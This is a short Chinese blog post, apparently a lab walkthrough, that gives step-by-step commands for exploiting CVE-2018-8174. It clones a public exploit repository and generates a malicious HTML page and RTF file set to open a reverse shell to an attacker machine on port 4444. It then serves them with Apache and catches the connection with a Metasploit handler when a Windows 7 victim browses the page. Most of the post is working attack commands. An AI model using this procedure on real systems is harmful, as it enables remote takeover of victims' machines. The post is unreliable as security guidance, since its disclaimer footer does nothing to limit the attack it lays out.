标签:set 攻击机 0day 192.168 漏洞 地址 html 2018
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git 从github上下载文件
cd CVE-2018-8174_EXP.git 进入文件夹
python CVE-2018-8174.py -u http://192.168.44.131/expolit.html -o hack.rtf -i 192.168.44.131 -p 4444
(-u 是攻击机的地址 -o生成一个文件 -i建立一个反弹链接 接口为4444)
cp exploit.html /var/www/html(将exploit.html 复制到var/www/html)
systemctl start apache2(启动阿帕奇服务)
cp hack.rtf /var/www/html (将文件复制到路径中)
接下来
启动msfconsole 模块
search handler找一下服务
使用命令,设置后台↓
show options(查看配置信息)
set lhost 192.168.44.131(设置下配置信息中的lhost)
- set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
- set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
- set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
然后用win7访问目标的网站
访问阿帕奇默认网页下的刚刚的python生成的文件
网页闪退,但是攻击机得到了响应
在kail中输入run命令运行
标签:set,攻击机,0day,192.168,漏洞,地址,html,2018 来源: https://www.cnblogs.com/ouzhougou/p/16268825.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。